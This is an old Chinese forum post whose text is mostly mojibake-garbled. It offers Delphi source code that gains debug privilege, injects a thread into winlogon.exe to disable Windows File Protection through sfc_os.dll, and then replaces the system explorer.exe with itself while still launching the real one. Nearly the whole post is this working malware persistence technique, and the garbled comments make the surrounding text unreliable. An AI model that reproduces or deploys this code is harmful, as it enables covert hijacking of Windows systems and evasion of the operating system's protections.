关闭XP保护。替换explorer¸exe¸txt
linkboy2004µÄ???Í?º?Ø?ÕXP??????Ìæ??explorer.exeÊÕ?Ø ?Ø?ÕXP??????Ìæ??explorer.exeÊÕ?Ø
????Ê??ä?º2008-02-01 20:32
µ??Á?º
????ÔÚÅ?µÄVPCÉÏ?âÊÔÊÇ?ÉÒÔµÄ??Ã?ÓÐ?ü?àµÄ?âÊÔ. ????Å???Ã?Óе?ÓÃdllcacheÄ?Â?ϵÄ.ÄãÏ????É ????{*******************************************************}
????{ }
????{ ?Ø?ÕXP??????Ìæ??explorer.exe }
????{ }
????{ ?æÈ?ËùÓÐ (C) 2008 bbs.secdst.net } ????{ }
????{*******************************************************}
????program Project1;
????uses
????Windows,TlHelp32;
????function LowerCase(const S: string): string; //תÐ?Ð?
????var
????Ch: Char;
????L: Integer;
????Source, Dest: PChar;
????begin
????L := Length(S);
????SetLength(Result, L);
????Source := Pointer(S);
????Dest := Pointer(Result);
????while L <>0 do
????begin
????Ch := Source^;
????if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32); ????Dest^ := Ch;
????Inc(Source);
????Inc(Dest);
????Dec(L);
????end;
????end;
????function CreatedMutexEx(MutexName: Pchar): Boolean; ????var
????MutexHandle: dword;
????begin
????MutexHandle := CreateMutex(nil, True, MutexName); ????if MutexHandle <>0 then
????begin
????if GetLastError = ERROR_ALREADY_EXISTS then ????begin
????//CloseHandle(MutexHandle);
????Result := False;
????Exit;
????end;
????end;
????Result := True;
????end;
????function GetWinPath: string; //È?WINDOWSÄ?Â? ????var
????Buf: array[0..MAX_PATH] of char;
????begin
????GetWindowsDirectory(Buf, MAX_PATH);
????Result := Buf;
????if Result[Length(Result)]<>'\' then Result := Result + '\';
????end;
????function GetTempDirectory: string; //È?ÁÙÊ?Ä?Â? ????var
????Buf: array[0..MAX_PATH] of char;
????begin
????GetTempPath(MAX_PATH,Buf);
????Result := Buf;
????if Result[Length(Result)]<>'\' then Result := Result + '\';
????end;
????function EnableDebugPriv : Boolean; //ÌáÈ?ΪDEBUG ????var
????hToken : THANDLE;
????tp : TTokenPrivileges;
????rl : Cardinal;
????begin
????result := false;
????OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES
or TOKEN_QUERY, hToken);
????if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
????begin
????tp.PrivilegeCount := 1;
????tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED; ????result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil,
rl);
????end;
????end;
????procedure InjectThread(ProcessHandle: DWORD); //×?Èëwinlogon.exe
?Ø?ÕXPÎÄ?þ????
????var
????TID: LongWord;
????hSfc,hThread: HMODULE;
????pfnCloseEvents: Pointer;
????begin
????hSfc := LoadLibrary('sfc_os.dll');
????pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2)); ????FreeLibrary(hSfc);
????hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
????WaitForSingleObject(hThread, 4000);
????end;
????procedure InitProcess(Name: string); //?éÕÒwinlogon.exe?ø?ÌPID ????var
????FSnapshotHandle: THandle;
????FProcessEntry32: TProcessEntry32;
????ProcessHandle:dword;
????begin
????FSnapshotHandle :=
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); ????FProcessEntry32.dwSize:=Sizeof(FProcessEntry32); ????if Process32First(FSnapshotHandle,FProcessEntry32) then begin ????repeat
????If Name = LowerCase(FProcessEntry32.szExeFile) then ????begin
????ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
????InjectThread(ProcessHandle);
????CloseHandle(ProcessHandle);
????Break;
????end;
????until not Process32Next(FSnapshotHandle,FProcessEntry32); ????end;
????CloseHandle(FSnapshotHandle);
????end;
????const ExpFile = 'explorer.exe';
????MasterMutex = 'OpenSoul';
????var
????s: string;
????begin
????if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //???ðÌå
????if not EnableDebugPriv then Exit; //ÌáÈ?Ê??ÜÍË?ö ????InitProcess('winlogon.exe') ;//×?Èëwinlogon.exe
ÏÈ?Ø?ÕxpµÄÎÄ?þ???? .Ô??ÀϵÍ?µÄ??Ô,
????s := ParamStr(0) ;//È???Ãû
????if LowerCase(s) <>LowerCase(GetWinPath + ExpFile) then //ÅÐ?Ï×Ô?ºÊÇ??ÊÇϵÍ?ϵÄexplorer.exe
????begin //Èç?û??ÊÇ
????MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //ÏÈÒÆ??ÕýÔÚÔËÐеÄexplorer.exe
????CopyFile(PChar(S),PChar(GetWinPath+
ExpFile),false) ;//?Ñ×Ô?º??ÖƵ?windowsÄ?Â? Ϊexplorer.exe ????end;
????WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //ÔËÐÐÕæÕýµÄexplorer.exe
????end.
Powered by soft.pt42.cn